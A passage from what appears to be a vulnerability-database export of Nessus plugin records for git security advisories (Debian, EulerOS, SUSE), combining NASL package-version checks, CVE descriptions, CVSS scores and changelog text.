(!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! preg(pattern:\"^(9)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 9.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '9.0', 'prefix': 'libgit2-24', 'reference': '0.25.1+really0.24.6-1+deb9u1'},\n {'release': '9.0', 'prefix': 'libgit2-dev', 'reference': '0.25.1+really0.24.6-1+deb9u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libgit2-24 / libgit2-dev');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-23T02:33:15", "description": "According to the versions of the git packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)\n\n - A shell command injection flaw related to the handling of 'ssh' URLs has been discovered in Git. An attacker could use this flaw to execute shell commands with the privileges of the user running the Git client, for example, when performing a 'clone' action on a malicious repository or a legitimate repository containing a malicious commit.(CVE-2017-1000117)\n\n - Git before 2.10.5, 2.11.x before 2.11.4, 2.12.x before 2.12.5, 2.13.x before 2.13.6, and 2.14.x before 2.14.2 uses unsafe Perl scripts to support subcommands such as cvsserver, which allows attackers to execute arbitrary OS commands via shell metacharacters in a module name.\n The vulnerable code is reachable via git-shell even without CVS support.(CVE-2017-14867)\n\n - It was found that the git-prompt.sh script shipped with git failed to correctly handle branch names containing special characters. A specially crafted git repository could use this flaw to execute arbitrary commands if a user working with the repository configured their shell to include repository information in the prompt.(CVE-2014-9938)\n\n - An integer truncation flaw and an integer overflow flaw, both leading to a heap-based buffer overflow, were found in the way Git processed certain path information. A remote attacker could create a specially crafted Git repository that would cause a Git client or server to crash or, possibly, execute arbitrary code.(CVE-2016-2324)\n\n - A flaw was found in the way the git-remote-ext helper processed certain URLs. If a user had Git configured to automatically clone submodules from untrusted repositories, an attacker could inject commands into the URL of a submodule, allowing them to execute arbitrary code on the user's system.(CVE-2015-7545)\n\n - Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive 'git clone' of a superproject if a .gitmodules file has a URL field beginning with a '-' character.(CVE-2018-17456)\n\n - An integer truncation flaw and an integer overflow flaw, both leading to a heap-based buffer overflow, were found in the way Git processed certain path information. A remote attacker could create a specially crafted Git repository that would cause a Git client or server to crash or, possibly, execute arbitrary code.(CVE-2016-2315)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : git (EulerOS-SA-2019-1420)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9938", "CVE-2015-7545", "CVE-2016-2315", "CVE-2016-2324", "CVE-2017-1000117", "CVE-2017-14867", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1420.NASL", "href": "https://www.tenable.com/plugins/nessus/124923", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124923);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-9938\",\n \"CVE-2015-7545\",\n \"CVE-2016-2315\",\n \"CVE-2016-2324\",\n \"CVE-2017-1000117\",\n \"CVE-2017-14867\",\n \"CVE-2018-11235\",\n \"CVE-2018-17456\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : git (EulerOS-SA-2019-1420)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the git packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x\n before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before\n 2.17.1, remote code execution can occur. With a crafted\n .gitmodules file, a malicious project can execute an\n arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are\n obtained from this file, and then appended to\n $GIT_DIR/modules, leading to directory traversal with\n '../' in a name. Finally, post-checkout hooks from a\n submodule are executed, bypassing the intended design\n in which hooks are not obtained from a remote\n server.(CVE-2018-11235)\n\n - A shell command injection flaw related to the handling\n of 'ssh' URLs has been discovered in Git. An attacker\n could use this flaw to execute shell commands with the\n privileges of the user running the Git client, for\n example, when performing a 'clone' action on a\n malicious repository or a legitimate repository\n containing a malicious commit.(CVE-2017-1000117)\n\n - Git before 2.10.5, 2.11.x before 2.11.4, 2.12.x before\n 2.12.5, 2.13.x before 2.13.6, and 2.14.x before 2.14.2\n uses unsafe Perl scripts to support subcommands such as\n cvsserver, which allows attackers to execute arbitrary\n OS commands via shell metacharacters in a module name.\n The vulnerable code is reachable via git-shell even\n without CVS support.(CVE-2017-14867)\n\n - It was found that the git-prompt.sh script shipped with\n git failed to correctly handle branch names containing\n special characters. A specially crafted git repository\n could use this flaw to execute arbitrary commands if a\n user working with the repository configured their shell\n to include repository information in the\n prompt.(CVE-2014-9938)\n\n - An integer truncation flaw and an integer overflow\n flaw, both leading to a heap-based buffer overflow,\n were found in the way Git processed certain path\n information. A remote attacker could create a specially\n crafted Git repository that would cause a Git client or\n server to crash or, possibly, execute arbitrary\n code.(CVE-2016-2324)\n\n - A flaw was found in the way the git-remote-ext helper\n processed certain URLs. If a user had Git configured to\n automatically clone submodules from untrusted\n repositories, an attacker could inject commands into\n the URL of a submodule, allowing them to execute\n arbitrary code on the user's system.(CVE-2015-7545)\n\n - Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before\n 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and\n 2.19.x before 2.19.1 allows remote code execution\n during processing of a recursive 'git clone' of a\n superproject if a .gitmodules file has a URL field\n beginning with a '-' character.(CVE-2018-17456)\n\n - An integer truncation flaw and an integer overflow\n flaw, both leading to a heap-based buffer overflow,\n were found in the way Git processed certain path\n information. A remote attacker could create a specially\n crafted Git repository that would cause a Git client or\n server to crash or, possibly, execute arbitrary\n code.(CVE-2016-2315)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1420\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8375b968\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-1.8.3.1-20.h1\",\n \"perl-Git-1.8.3.1-20.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-15T13:46:17", "description": "This update for git fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2020-11008: Specially crafted URLs may have tricked the credentials helper to providing credential information that is not appropriate for the protocol in use and host being contacted (bsc#1169936)\n\ngit was updated to 2.26.1 (bsc#1169786, jsc#ECO-1628, bsc#1149792)\n\nFix git-daemon not starting after conversion from sysvinit to systemd service (bsc#1169605).\n\nCVE-2020-5260: Specially crafted URLs with newline characters could have been used to make the Git client to send credential information for a wrong host to the attacker's site bsc#1168930\n\ngit 2.26.0 (bsc#1167890, jsc#SLE-11608) :\n\n'git rebase' now uses a different backend that is based on the 'merge' machinery by default. The 'rebase.backend' configuration variable reverts to old behaviour when set to 'apply'\n\nImproved handling of sparse checkouts\n\nImprovements to many commands and internal features\n\ngit 2.25.2 :\n\nbug fixes to various subcommands in specific operations\n\ngit 2.25.1 :\n\n'git commit' now honors advise.statusHints\n\nvarious updates, bug fixes and documentation updates\n\ngit 2.25.0\n\nThe branch description ('git branch --edit-description') has been used to fill the body of the cover letters by the format-patch command;\nthis has been enhanced so that the subject can also be filled.\n\nA few commands learned to take the pathspec from the standard input or a named file, instead of taking it as the command line arguments, with the '--pathspec-from-file' option.\n\nTest updates to prepare for SHA-2 transition continues.\n\nRedo 'git name-rev' to avoid recursive calls.\n\nWhen all files from some subdirectory were renamed to the root directory, the directory rename heuristics would fail to detect that as a rename/merge of the subdirectory to the root directory, which has been corrected.\n\nHTTP transport had possible allocator/deallocator mismatch, which has been corrected.\n\ngit 2.24.1 :\n\nCVE-2019-1348: The --export-marks option of fast-import is exposed also via the in-stream command feature export-marks=... and it allows overwriting arbitrary paths (bsc#1158785)\n\nCVE-2019-1349: on Windows, when submodules are cloned recursively, under certain circumstances Git could be fooled into using the same Git directory twice (bsc#1158787)\n\nCVE-2019-1350: Incorrect quoting of command-line arguments allowed remote code execution during a recursive clone in conjunction with SSH URLs (bsc#1158788)\n\nCVE-2019-1351: on Windows mistakes drive letters outside of the US-English alphabet as relative paths (bsc#1158789)\n\nCVE-2019-1352: on Windows was unaware of NTFS Alternate Data Streams (bsc#1158790)\n\nCVE-2019-1353: when run in the Windows Subsystem for Linux while accessing a working directory on a regular Windows drive, none of the NTFS protections were active (bsc#1158791)\n\nCVE-2019-1354: on Windows refuses to write tracked files with filenames that contain backslashes (bsc#1158792)\n\nCVE-2019-1387: Recursive clones vulnerability that is caused by too-lax validation of submodule names, allowing very targeted attacks via remote code execution in recursive clones (bsc#1158793)\n\nCVE-2019-19604: a recursive clone followed by a submodule update could execute code contained within the repository without the user explicitly having asked for that (bsc#1158795)\n\ngit 2.24.0\n\nThe command line parser learned '--end-of-options' notation.\n\nA mechanism to affect the default setting for a (related) group of configuration variables is introduced.\n\n'git fetch' learned '--set-upstream' option to help those who first clone from their private fork they intend to push to, add the true upstream via 'git remote add' and then 'git fetch' from it.\n\nfixes and improvements to UI, workflow and features, bash completion fixes\n\ngit 2.23.0 :\n\nThe '--base' option of 'format-patch' computed the patch-ids for prerequisite patches in an unstable way, which has been updated to compute in a way that is compatible with 'git patch-id\n\n--stable'.\n\nThe 'git log' command by default behaves as if the --mailmap option was given.\n\nfixes and improvements to UI, workflow and features\n\ngit 2.22.1\n\nA relative pathname given to 'git init --template=<path> <repo>' ought to be relative to the directory 'git init' gets invoked in, but it instead was made relative to the repository, which has been corrected.\n</repo></path>\n\n'git worktree add' used to fail when another worktree connected to the same repository was corrupt, which has been corrected.\n\n'git am -i --resolved' segfaulted after trying to see a commit as if it were a tree, which has been corrected.\n\n'git merge --squash' is designed to update the working tree and the index without creating the commit, and this cannot be countermanded by adding the '--commit' option; the command now refuses to work when both options are given.\n\nUpdate to Unicode 12.1 width table.\n\n'git request-pull' learned to warn when the ref we ask them to pull from in the local repository and in the published repository are different.\n\n'git fetch' into a lazy clone forgot to fetch base objects that are necessary to complete delta in a thin packfile, which has been corrected.\n\nThe URL decoding code has been updated to avoid going past the end of the string while parsing %-<hex>-<hex> sequence. </hex></hex>\n\n'git clean' silently skipped a path when it cannot lstat() it; now it gives a warning.\n\n'git rm' to resolve a conflicted path leaked an internal message 'needs merge' before actually removing the path, which was confusing.\nThis has been corrected.\n\nMany more bugfixes and code cleanups.\n\nremoval of SuSEfirewall2 service, since SuSEfirewall2 has been replaced by firewalld.\n\npartial fix for git instaweb giving 500 error (bsc#1112230)\n\ngit 2.22.0\n\nThe filter specification '--filter=sparse:path=<path>' used to create a lazy/partial clone has been removed. Using a blob that is part of the project as sparse specification is still supported with the '--filter=sparse:oid=<blob>' option </blob></path>\n\n'git checkout --no-overlay' can be used to trigger a new mode of checking out paths out of the tree-ish, that allows paths that match the pathspec that are in the current index and working tree and are not in the tree-ish.\n\nFour new configuration variables {author,committer}.{name,email} have been introduced to override user.{name,email} in more specific cases.\n\n'git branch' learned a new subcommand '--show-current'.\n\nThe command line completion (in contrib/) has been taught to complete more subcommand parameters.\n\nThe completion helper code now pays attention to repository-local configuration (when available), which allows --list-cmds to honour a repository specific setting of completion.commands, for example.\n\nThe list of conflicted paths shown in the editor while concluding a conflicted merge was shown above the scissors line when the clean-up mode is set to 'scissors', even though it was commented out just like the list of updated paths and other information to help the user explain the merge better.\n\n'git rebase' that was reimplemented in C did not set ORIG_HEAD correctly, which has been corrected.\n\n'git worktree add' used to do a 'find an available name with stat and then mkdir', which is race-prone. This has been fixed by using mkdir and reacting to EEXIST in a loop.\n\nMove to DocBook 5.x. Asciidoctor 2.x no longer supports the legacy DocBook 4.5 format.\n\nupdate git-web AppArmor profile for bash and tar usrMerge (bsc#1132350)\n\ngit 2.21.0\n\nHistorically, the '-m' (mainline) option can only be used for 'git cherry-pick' and 'git revert' when working with a merge commit. This version of Git no longer warns or errors out when working with a single-parent commit, as long as the argument to the '-m' option is 1 (i.e. it has only one parent, and the request is to pick or revert relative to that first parent). Scripts that relied on the behaviour may get broken with this change.\n\nSmall fixes and features for fast-export and fast-import.\n\nThe 'http.version' configuration variable can be used with recent enough versions of cURL library to force the version of HTTP used to talk when fetching and pushing.\n\n'git push $there $src:$dst' rejects when $dst is not a fully qualified refname and it is not clear what the end user meant.\n\nUpdate 'git multimail' from the upstream.\n\nA new date format '--date=human' that morphs its output depending on how far the time is from the current time has been introduced.\n'--date=auto:human' can be used to use this new format (or any existing format) when the output is going to the pager or to the terminal, and otherwise the default format.\n\nFix worktree creation race (bsc#1114225).\n\nadd shadow build dependency to the -daemon subpackage.\n\ngit 2.20.1 :\n\nportability fixes\n\n'git help -a' did not work well when an overly long alias was defined\n\nno longer squelched an error message when the run_command API failed to run a missing command\n\ngit 2.20.0\n\n'git help -a' now gives verbose output (same as 'git help -av'). Those who want the old output may say 'git help --no-verbose -a'..\n\n'git send-email' learned to grab address-looking string on any trailer whose name ends with '-by'.\n\n'git format-patch' learned new '--interdiff' and '--range-diff' options to explain the difference between this version and the previous attempt in the cover letter (or after the three-dashes as a comment).\n\nDeveloper builds now use -Wunused-function compilation option.\n\nFix a bug in which the same path could be registered under multiple worktree entries if the path was missing (for instance, was removed manually). Also, as a convenience, expand the number of cases in which\n\n--force is applicable.\n\nThe overly large Documentation/config.txt file have been split into million little pieces. This potentially allows each individual piece to be included into the manual page of the command it affects more easily.\n\nMalformed or crafted data in packstream can make our code attempt to read or write past the allocated buffer and abort, instead of reporting an error, which has been fixed.\n\nFix for a long-standing bug that leaves the index file corrupt when it shrinks during a partial commit.\n\n'git merge' and 'git pull' that merges into an unborn branch used to completely ignore '--verify-signatures', which has been corrected.\n\n...and much more features and fixes\n\ngit 2.19.2 :\n\nvarious bug fixes for multiple subcommands and operations\n\ngit 2.19.1 :\n\nCVE-2018-17456: Specially crafted .gitmodules files may have allowed arbitrary code execution when the repository is cloned with\n\n--recurse-submodules (bsc#1110949)\n\ngit 2.19.0 :\n\n'git diff' compares the index and the working tree. For paths added with intent-to-add bit, the command shows the full contents of them as added, but the paths themselves were not marked as new files. They are now shown as new by default.\n\n'git apply' learned the '--intent-to-add' option so that an otherwise working-tree-only application of a patch will add new paths to the index marked with the 'intent-to-add' bit.\n\n'git grep' learned the '--column' option that gives not just the line number but the column number of the hit.\n\nThe '-l' option in 'git branch -l' is an unfortunate short-hand for '--create-reflog', but many users, both old and new, somehow expect it to be something else, perhaps '--list'. This step warns when '-l' is used as a short-hand for '--create-reflog' and warns about the future repurposing of the it when it is used.\n\nThe userdiff pattern for .php has been updated.\n\nThe content-transfer-encoding of the message 'git send-email' sends out by default was 8bit, which can cause trouble when there is an overlong line to bust RFC 5322/2822 limit. A new option 'auto' to automatically switch to quoted-printable when there is such a line in the payload has been introduced and is made the default.\n\n'git checkout' and 'git worktree add' learned to honor checkout.defaultRemote when auto-vivifying a local branch out of a remote tracking branch in a repository with multiple remotes that have tracking branches that share the same names. (merge 8d7b558bae ab/checkout-default-remote later to maint).\n\n'git grep' learned the '--only-matching' option.\n\n'git rebase --rebase-merges' mode now handles octopus merges as well.\n\nAdd a server-side knob to skip commits in exponential/fibbonacci stride in an attempt to cover wider swath of history with a smaller number of iterations, potentially accepting a larger packfile transfer, instead of going back one commit a time during common ancestor discovery during the 'git fetch' transaction. (merge 42cc7485a2 jt/fetch-negotiator-skipping later to maint).\n\nA new configuration variable core.usereplacerefs has been added, primarily to help server installations that want to ignore the replace mechanism altogether.\n\nTeach 'git tag -s' etc. a few configuration variables (gpg.format that can be set to 'openpgp' or 'x509', and gpg.<format>.program that is used to specify what program to use to deal with the format) to allow x.509 certs with CMS via 'gpgsm' to be used instead of openpgp via 'gnupg'. </format>\n\nMany more strings are prepared for l10n.\n\n'git p4 submit' learns to ask its own pre-submit hook if it should continue with submitting.\n\nThe test performed at the receiving end of 'git push' to prevent bad objects from entering repository can be customized via receive.fsck.* configuration variables; we now have gained a counterpart to do the same on the 'git fetch' side, with fetch.fsck.* configuration variables.\n\n'git pull --rebase=interactive' learned 'i' as a short-hand for 'interactive'.\n\n'git instaweb' has been adjusted to run better with newer Apache on RedHat based distros.\n\n'git range-diff' is a reimplementation of 'git tbdiff' that lets us compare individual patches in two iterations of a topic.\n\nThe sideband code learned to optionally paint selected keywords at the beginning of incoming lines on the receiving end.\n\n'git branch --list' learned to take the default sort order from the 'branch.sort' configuration variable, just like 'git tag --list' pays attention to 'tag.sort'.\n\n'git worktree' command learned '--quiet' option to make it less verbose.\n\ngit 2.18.0 :\n\nimprovements to rename detection logic\n\nWhen built with more recent cURL, GIT_SSL_VERSION can now specify 'tlsv1.3' as its value.\n\n'git mergetools' learned talking to guiffy.\n\nvarious other workflow improvements and fixes\n\nperformance improvements and other developer visible fixes\n\ngit 2.17.1\n\nSubmodule 'names' come from the untrusted .gitmodules file, but we blindly append them to $GIT_DIR/modules to create our on-disk repo paths. This means you can do bad things by putting '../' into the name. We now enforce some rules for submodule names which will cause Git to ignore these malicious names (CVE-2018-11235, bsc#1095219)\n\nIt was possible to trick the code that sanity-checks paths on NTFS into reading random piece of memory (CVE-2018-11233, bsc#1095218)\n\nSupport on the server side to reject pushes to repositories that attempt to create such problematic .gitmodules file etc. as tracked contents, to help hosting sites protect their customers by preventing malicious contents from spreading.\n\ngit 2.17.0 :\n\n'diff' family of commands learned '--find-object=<object-id>' option to limit the findings to changes that involve the named object.\n</object-id>\n\n'git format-patch' learned to give 72-cols to diffstat, which is consistent with other line length limits the subcommand uses for its output meant for e-mails.\n\nThe log from 'git daemon' can be redirected with a new option; one relevant use case is to send the log to standard error (instead of syslog) when running it from inetd.\n\n'git rebase' learned to take '--allow-empty-message' option.\n\n'git am' has learned the '--quit' option, in addition to the existing '--abort' option; having the pair mirrors a few other commands like 'rebase' and 'cherry-pick'.\n\n'git worktree add' learned to run the post-checkout hook, just like 'git clone' runs it upon the initial checkout.\n\n'git tag' learned an explicit '--edit' option that allows the message given via '-m' and '-F' to be further edited.\n\n'git fetch --prune-tags' may be used as a handy short-hand for getting rid of stale tags that are locally held.\n\nThe new '--show-current-patch' option gives an end-user facing way to get the diff being applied when 'git rebase' (and 'git am') stops with a conflict.\n\n'git add -p' used to offer '/' (look for a matching hunk) as a choice, even there was only one hunk, which has been corrected. Also the single-key help is now given only for keys that are enabled (e.g. help for '/' won't be shown when there is only one hunk).\n\nSince Git 1.7.9, 'git merge' defaulted to --no-ff (i.e. even when the side branch being merged is a descendant of the current commit, create a merge commit instead of fast-forwarding) when merging a tag object.\nThis was appropriate default for integrators who pull signed tags from their downstream contributors, but caused an unnecessary merges when used by downstream contributors who habitually 'catch up' their topic branches with tagged releases from the upstream. Update 'git merge' to default to --no-ff only when merging a tag object that does *not* sit at its usual place in refs/tags/ hierarchy, and allow fast-forwarding otherwise, to mitigate the problem.\n\n'git status' can spend a lot of cycles to compute the relation between the current branch and its upstream, which can now be disabled with '--no-ahead-behind' option.\n\n'git diff' and friends learned funcname patterns for Go language source files.\n\n'git send-email' learned '--reply-to=<address>' option. </address>\n\nFuncname pattern used for C# now recognizes 'async' keyword.\n\nIn a way similar to how 'git tag' learned to honor the pager setting only in the list mode, 'git config' learned to ignore the pager setting when it is used for setting values (i.e. when the purpose of the operation is not to 'show').\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-29T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : git (SUSE-SU-2020:1121-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-15298", "CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456", "CVE-2019-1348", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1351", "CVE-2019-1352", "CVE-2019-1353", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-19604", "CVE-2020-11008", "CVE-2020-5260"], "modified": "2022-05-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git", "p-cpe:/a:novell:suse_linux:git-arch", "p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-core-debuginfo", "p-cpe:/a:novell:suse_linux:git-credential-gnome-keyring", "p-cpe:/a:novell:suse_linux:git-credential-gnome-keyring-debuginfo", "p-cpe:/a:novell:suse_linux:git-credential-libsecret", "p-cpe:/a:novell:suse_linux:git-credential-libsecret-debuginfo", "p-cpe:/a:novell:suse_linux:git-cvs", "p-cpe:/a:novell:suse_linux:git-daemon", "p-cpe:/a:novell:suse_linux:git-daemon-debuginfo", "p-cpe:/a:novell:suse_linux:git-debuginfo", "p-cpe:/a:novell:suse_linux:git-debugsource", "p-cpe:/a:novell:suse_linux:git-email", "p-cpe:/a:novell:suse_linux:git-gui", "p-cpe:/a:novell:suse_linux:git-p4", "p-cpe:/a:novell:suse_linux:git-svn", "p-cpe:/a:novell:suse_linux:git-svn-debuginfo", "p-cpe:/a:novell:suse_linux:git-web", "p-cpe:/a:novell:suse_linux:gitk", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-1121-1.NASL", "href": "https://www.tenable.com/plugins/nessus/136074", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1121-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136074);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\n \"CVE-2017-15298\",\n \"CVE-2018-11233\",\n \"CVE-2018-11235\",\n \"CVE-2018-17456\",\n \"CVE-2019-1348\",\n \"CVE-2019-1349\",\n \"CVE-2019-1350\",\n \"CVE-2019-1351\",\n \"CVE-2019-1352\",\n \"CVE-2019-1353\",\n \"CVE-2019-1354\",\n \"CVE-2019-1387\",\n \"CVE-2019-19604\",\n \"CVE-2020-5260\",\n \"CVE-2020-11008\"\n );\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : git (SUSE-SU-2020:1121-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for git fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2020-11008: Specially crafted URLs may have tricked the\ncredentials helper to providing credential information that is not\nappropriate for the protocol in use and host being contacted\n(bsc#1169936)\n\ngit was updated to 2.26.1 (bsc#1169786, jsc#ECO-1628, bsc#1149792)\n\nFix git-daemon not starting after conversion from sysvinit to systemd\nservice (bsc#1169605).\n\nCVE-2020-5260: Specially crafted URLs with newline characters could\nhave been used to make the Git client to send credential information\nfor a wrong host to the attacker's site bsc#1168930\n\ngit 2.26.0 (bsc#1167890, jsc#SLE-11608) :\n\n'git rebase' now uses a different backend that is based on the 'merge'\nmachinery by default. The 'rebase.backend' configuration variable\nreverts to old behaviour when set to 'apply'\n\nImproved handling of sparse checkouts\n\nImprovements to many commands and internal features\n\ngit 2.25.2 :\n\nbug fixes to various subcommands in specific operations\n\ngit 2.25.1 :\n\n'git commit' now honors advise.statusHints\n\nvarious updates, bug fixes and documentation updates\n\ngit 2.25.0\n\nThe branch description ('git branch --edit-description') has been used\nto fill the body of the cover letters by the format-patch command;\nthis has been enhanced so that the subject can also be filled.\n\nA few 